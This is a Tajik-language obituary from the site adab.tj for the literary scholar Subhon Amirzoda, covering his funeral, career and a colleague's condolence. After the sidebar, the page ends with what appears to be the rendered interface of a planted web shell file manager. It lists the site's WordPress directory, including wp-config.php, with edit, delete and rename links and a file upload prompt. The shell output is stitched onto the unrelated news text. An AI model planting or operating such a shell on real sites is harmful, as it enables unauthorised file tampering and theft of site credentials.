28.2 C
Душанбе

Профессор Субҳон Амирзода даргузашт

Субҳон Амирзода, адабпажӯҳ ва донишманди тоҷик шоми 29-уми апрел дар 89-солагӣ аз дунё даргузашт.

Тибқи иттилоъи наздиконаш, ҷанозаи Субҳон Амирзода зуҳри имрӯз, 30-юми апрел, дар масҷиди Каленини Душанбе баргузор гардида, ҷасади вай дар оромгоҳи “Навобод”-и ин мавзеъ ба хок супурда шуд.

Бояд гуфт, ки профессор Субҳон Амирзода донишманди соҳибфикр ва варзидаи адабиёт буд. Вай солҳо дар кафедраи таърихи адабиёти тоҷик ва Пажӯҳишгоҳи Донишгоҳи миллии Тоҷикистон заҳмат кашида, пажӯҳишҳои муҳим ва мондагоре анҷом дод.

Дар робита ба зоеъа шогирдону пайравони Амирзода дар шабакаи иҷтимоъии Фейсбук аз вай ҳамчун инсони фурӯтан, ботамкин, меҳрубон, самимӣ ва ба дур аз ҳар гуна тамаллуқ ёд кардаанд.

Аз ҷумла Лола Ҳоҷибоева, адабиётшиноси тоҷик дар як паёми таслиятӣ навишт, ки “шоми баҳории дирӯзам бо шунидани хабари даргузашти устод Амирзода сарду тира гашт… Муддате буд ба ҳамроҳи дӯсти азизам Анзуратбону мунтазири баргаштани устод аз мусофират будем, то ба зиёраташон ва суҳбаташон бирасем. Акнун мусофирати устод ба ҷаҳони гетӣ поён ёфта ва ба хонаи хеш, ки ҷаҳонест мину, баргаштанд. Мо мондему дасти кӯтоҳамон…”

Гуфтанист, Субҳон Амирзода 25-уми июни соли 1935 дар деҳаи Гулшани ноҳияи Ғузори Ӯзбекистон ба дунё омада, Донишсарои Душанберо дар соли 1955 хатм кардааст.

Муддате дар Нашриёти давлатии Тоҷикистон кор карда, пас аз итмоми аспирантура дар кафедраи таърихи адабиёти классикии Донишгоҳи давлатии Тоҷикистон ба таълиму тадрис пардохтааст.

Ӯ доктори илми филология ва профессор буда, маҳсули таҳқиқу пажӯҳишҳояш ба беш аз 150 рисолаву мақолаи илмӣ мерасид.

Гуфта мешавад, ки дар таҳқиқи адабиёти садаи XIX, ки аз дидгоҳи мунсифонаи илмӣ ва таърихӣ камтар шинохта ва арзёбӣ шудааст, ёфтаҳо ва натиҷагириҳои устод Амирзода аз эътибори илмии марҷаъ бархурдор аст.

Ҳафтавори «Адабиёт ва санъат» аз даргузашти Субҳон Амирзода андӯҳгин буда, ба наздикону пайвандонаш ҳамдардӣ баён мекунад.

- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Upload File: